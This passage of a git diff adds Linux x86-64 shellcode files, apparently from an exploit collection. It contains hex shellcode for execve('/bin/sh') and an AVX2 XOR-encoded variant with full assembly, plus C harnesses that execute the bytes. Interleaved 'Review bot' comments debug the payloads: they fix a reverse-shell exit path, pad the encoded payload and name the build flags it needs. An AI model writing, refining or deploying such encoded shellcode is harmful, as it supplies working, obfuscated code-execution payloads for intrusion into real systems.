+"\x31\xc0\x50\x54\x5a\x48\xbe\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x54\x5f" +"\x50\x57\x54\x5e\xb0\x3b\x0f\x05\xb0\x3c\x0f\x05"; + +int main() { + printf("length: %lu\n", strlen(code)); + ((int(*)()) code)(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86-64/47292.c b/shellcodes/linux_x86-64/47292.c new file mode 100644 index 000000000..04ad71638 --- /dev/null +++ b/shellcodes/linux_x86-64/47292.c 
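Review bot: The `connect` return value is never checked, and `exit` depends on the commented-out `xor eax, eax` with the remark `upper bytes are zero after read`, which is only true when `read` succeeded: if the connection fails, `read` on the unconnected socket returns a negative errno in `rax`, the password compare misses, `jne exit` is taken, and `mov al, 60` leaves `rax` as `0xffffffffffffff3c` rather than `SYS_exit`, so the syscall fails and execution runs off the end of the shellcode. Restoring `xor eax, eax` before `mov al, 60` in `exit` costs two bytes and fixes the path; checking `rax` after `connect` (`test eax, eax` / `jnz exit`) avoids the pointless `dup2`/`read` on a dead socket. The same prefix-only comparison as the bind-shell variant applies here: `repz cmpsb` with `rcx = pass_len` accepts any input that begins with the password, and the single 16-byte `read` caps the usable password length.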
@@ -0,0 +1,47 @@
+/*
+; Title : Linux/x86_64 - AVX2 XOR Decoder + execve("/bin/sh") (62 bytes)
+; Date : 2019-08-18
+; Author : Gonçalo Ribeiro (@goncalor)
+; Website : goncalor.com
+; SLAE64-ID : 1635
+
+; this only works on machines with a CPU that supports AVX2 instructions
+
+global _start
+
+_start:
+ jmp call_decoder
+
+decoder:
+ pop rsi
+ lea rdi, [rsi+1]
+
+ ; shellcode is less than 32 bytes long. can decode with single 256-bit xor.
+ ; for longer shellcodes a loop could be added
+ vpbroadcastb ymm1, [rsi] ; avx2
+ vmovdqu ymm0, [rdi] ; avx
+ vpxor ymm0, ymm1 ; avx2
+ vmovdqu [rdi], ymm0 ; avx
+
+ jmp encoded_shellcode
+
+call_decoder:
+ call decoder
+ xor_value: db 0xaa
+ encoded_shellcode: db 0xe2,0x9b,0x6a,0xfa,0xe2,0x23,0x48,0xe2,0x14,0x85,0xc8,0xc3,0xc4,0x85,0x85,0xd9,0xc2,0xfc,0xe2,0x23,0x4d,0xfa,0xfd,0xe2,0x23,0x4c,0x1a,0x91,0xa5,0xaf
+*/
+
+
+#include 
+#include 
+
+char code[] =
+"\xeb\x18\x5e\x48\x8d\x7e\x01\xc4\xe2\x7d\x78\x0e\xc5\xfe\x6f\x07\xc5\xfd"
+"\xef\xc1\xc5\xfe\x7f\x07\xeb\x06\xe8\xe3\xff\xff\xff\xaa\xe2\x9b\x6a\xfa"
+"\xe2\x23\x48\xe2\x14\x85\xc8\xc3\xc4\x85\x85\xd9\xc2\xfc\xe2\x23\x4d\xfa"
+"\xfd\xe2\x23\x4c\x1a\x91\xa5\xaf";
+
+int main() {
+ printf("length: %lu\n", strlen(code));
+ ((int(*)()) code)();
+}
\ No newline at end of file
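Review bot: `vmovdqu ymm0, [rdi]` / `vmovdqu [rdi], ymm0` read and write 32 bytes starting at `encoded_shellcode`, but the encoded payload is 30 bytes (the `db` list in `call_decoder`, and 62 − 32 bytes of stub/key in `code[]`), so the decoder XORs two bytes past the end of the shellcode — in the harness that is the NUL terminator of `code[]` and the byte after it in `.data`, and in a real injection whatever follows the buffer. Padding the payload to a full 32 bytes keeps the vector store inside the buffer: append two filler bytes to the `db` line (e.g. `..., 0xa5, 0xaf, 0xaa, 0xaa`, which decode to bytes that sit after the `execve` syscall and are never executed) and bump the length in the title and the `code[]` string accordingly. The decoder also modifies its own bytes in place, so the harness needs `code[]` to be both writable and executable; a note on the required build flags (presumably `-z execstack`) alongside the existing AVX2 caveat would save readers a segfault.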